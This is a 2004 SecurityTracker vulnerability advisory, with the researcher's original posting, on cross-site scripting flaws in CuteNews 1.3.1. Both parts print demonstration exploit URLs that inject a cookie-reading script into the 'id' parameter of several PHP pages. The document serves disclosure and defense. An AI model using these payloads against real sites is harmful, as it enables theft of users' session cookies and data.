CuteNews Input Validation Holes Let Remote Users Conduct Cross-Site Scripting Attacks
|
|
SecurityTracker Alert ID: 1010595
|
|
SecurityTracker URL: http://securitytracker.com/id?1010595
|
|
CVE Reference: CAN-2004-0660
(Links to External Site)
|
Updated: Jul 15 2004
|
Original Entry Date: Jun 28 2004
|
Impact: Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
|
Exploit Included: Yes
|
Version(s): 1.3.1
|
Description: DarkBicho reported an input validation vulnerability in CuteNews. A remote user can conduct cross-site scripting attacks.
It is reported that the several scripts do not properly filter HTML code from user-supplied input before displaying the information.
A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be
executed by the target user's browser. The code will originate from the site running the CuteNews software and will run in the security
context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies),
if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on
the site acting as the target user.
Some demonstration exploit URLs are provided:
http://[target]/show_archives.php?subaction=showcomments&id=<script>alert(document
.cookie);</script>&archive=&start_from=&uca&p
http://[target]/show_news.php?subaction=showcomments&id=<script>alert(document.cookie);</script>&archive=&start_from=&uca
t=&a
http://[target]/example1.php?subaction=showfull&id=<script>alert(document.cookie);</script>
http://[target]/example2.php?subaction=showfull&id=<script>alert(do
cument.cookie);</script>
The vendor has reportedly been notified.
The original advisory is available at:
http://www.swp-zone.org/archivos/advisory-06.txt
|
Impact: A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the
CuteNews software, access data recently submitted by the target user via web form to the site, or take actions on the site acting
as the target user.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.cutephp.com/ (Links to External Site)
|
Cause: Input validation error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: DarkBicho <darkbicho@fastmail.fm>
|
Message History:
None.
|
Source Message Contents
|
Date: Sun, 27 Jun 2004 17:38:28 -0700
From: DarkBicho <darkbicho@fastmail.fm>
Subject: Cross-Site Scripting CuteNews
|
http://www.swp-zone.org/archivos/advisory-06.txt
-------------------------------------------------------------------------------------------------
:.: Cross-Site Scripting CuteNews :.:
PROGRAM: CuteNews
HOMEPAGE: http://cutephp.com/
VERSION: v1.3.1
BUG: Cross-Site Scripting
DATE: 23/05/2004
AUTHOR: DarkBicho
web: http://www.darkbicho.tk
team: Security Wari Proyects <www.swp-zone.org>
Email: darkbicho@peru.com
-------------------------------------------------------------------------------------------------
1.- Affected software description:
-----------------------------
CuteNews is a popular News Publishing, written in php by
CutePHP.
2.- Vulnerabilities:
---------------
A. Cross-Site Scripting aka XSS:
:.: In Id :
http://attacker/show_archives.php?subaction=showcomments&id=<script>alert(document.cookie);< /script>&archive=&start_from=&ucat=&&archive=&start_from=&ucat=&
http://attacker/show_news.php?subaction=showcomments&id=<script>alert(document.cookie);< /script>&archive=&start_from=&ucat=&
http://attacker/example1.php?subaction=showfull&id=<script>alert(document.cookie);</scri pt>
http://attacker/example2.php?subaction=showfull&id=<script>alert(document.cookie);</scri pt>
3.- SOLUTION:
จจจจจจจจ
Vendors were contacted many weeks ago and plan to release a fixed
version soon.
Check the CuteNews website for updates and official release details.
4.- Greetings:
---------
greetings to my Peruvian group swp and perunderforce :D
"EL PISCO ES Y SERA PERUANO"
5.- Contact
-------
WEB: http://www.darkbicho.tk
EMAIL: darkbicho@peru.com
-------------------------------------------------------------------------------------------------
___________ ____________
/ _____/ \ / \______ \
\_____ \\ \/\/ /| ___/
/ \\ / | |
/_______ / \__/\ / |____|
\/ \/
Security Wari Projects
(c) 2002 - 2004
Made in Peru
----------------------------------------[ EOF
]----------------------------------------------
DarkBicho
Web: http://www.darkbicho.tk
"Mi unico delito es ver lo que otros no pueden ver"
---------------------- The End ----------------------
|
|